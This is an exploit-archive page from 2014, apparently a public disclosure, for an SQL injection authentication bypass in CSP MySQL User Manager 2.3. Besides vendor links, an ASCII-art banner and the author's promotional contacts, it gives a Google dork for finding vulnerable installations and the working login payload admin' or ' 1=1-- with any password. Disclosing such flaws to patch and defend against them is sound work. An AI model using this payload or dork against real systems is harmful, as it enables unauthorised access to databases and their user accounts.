Home / exploits CSP MySQL User Manager 2.3 SQL Injection
Posted on 09 January 2014
# Exploit Title: CSP MySQL User Manager v2.3 SQL Injection Authentication Bypass # Google Dork: intitle:"CSP MySQL User Manager" # Date: 8/1/2013 # Exploit Author: Youssef mami # Vendor Homepage: https://code.google.com/p/cspmum/ # Software Link: https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q= # Version: 2.3 # Tested on: Linux 2.6.38-11 # CVE : nothing ################################################################################## .__ __ | |__ _____ _____ _____ _____ _____ _____/ |_ | | \__ / / \__ / \_/ __ __ | Y / __ | Y Y Y Y / __ | Y Y ___/| | |___| (____ /__|_| /__|_| (____ /__|_| /\___ >__| / / / / / / / .__ _____ __ .__ |__| _____/ ____\___________ _____ _____ _/ |_|__| ________ __ ____ | |/ __/ _ \_ __ / \__ \ __ |/ ____/ | \_/ __ | | | | ( <_> ) | / Y Y / __ | | | < <_| | | / ___/ |__|___| /__| \____/|__| |__|_| (____ /__| |__|\__ |____/ \___ > / / / |__| / .__ ______ ______________ _|__| ____ ____ ______ / ___// __ \_ __ / / |/ ___/ __ / ___/ \___ \ ___/| | / /| \__ ___/ \___ /____ >\___ >__| \_/ |__|\___ >___ >____ > / / / / / ################################################################################## SQL Injection Authentication Bypass Product Page: https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q= Author(Pentester): Youssef mami (contact@hammamet-services.com) On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog ) On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info ################################################################################## we just need to input admin login like this : admin' or ' 1=1-- and any password :-) login : admin' or ' 1=1-- password: hammamet informatique services
